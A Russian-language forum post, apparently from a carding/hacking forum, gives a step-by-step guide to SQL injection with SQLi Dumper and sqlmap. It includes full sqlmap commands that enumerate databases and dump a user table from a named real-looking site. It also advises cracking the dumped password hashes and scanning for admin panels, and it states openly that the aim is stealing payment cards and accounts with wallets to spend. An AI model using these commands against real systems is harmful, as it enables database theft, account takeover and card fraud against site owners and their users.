Перейти к публикации
1
1
1
1
1
msgMako

SQLi Dumper & SQL Map

Рекомендованные сообщения

Приветствую, расскажу о SQLi Dumper и SQL Map.
Те, кто внимательно читал мою статью про Havij догадываются о чем будет идти речь. Если нет, то это два хороших инструмента кардера и хакера.
Вот так выглядит 
SQLi Dumper
LdQh8X2.gif
Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.

kzQoqRk.png
Затем произойдет магия сама по себе... smile.png
Нажимаем на базе данных и нажимаем
 Get Tables
P9zIeSN.png
Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
ZvIoM0r.png
Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
dc3Ygft.png
Круто?

Идем дальше, успеваете?
SQL Map
Идем в командную строку и в раздел
 SQL Map
CCNBNga.png

Вводим эту команду 
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs

Проявите немного терпения пока процесс закончится
Guqux08.png
Теперь, чтобы получить таблицы для той базы данных вводим эту команду

sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 --tables 
rVtaM54.png
Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --columns

ybdDN8T.png
Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду

sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --dump
lasCaCF.png
Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки python скрипт:

ССЫЛКА

s9U1Whp.png
Затем нажимаем Enter и должен пойти поиск специфической директории 
rNYZVD9.png
Все, пошел процес сканирования

Выглядит все сложно и сыро, понимаю smile.png
Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их smile.png
Всем удачи и экспериментов smile.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×
×
  • Создать...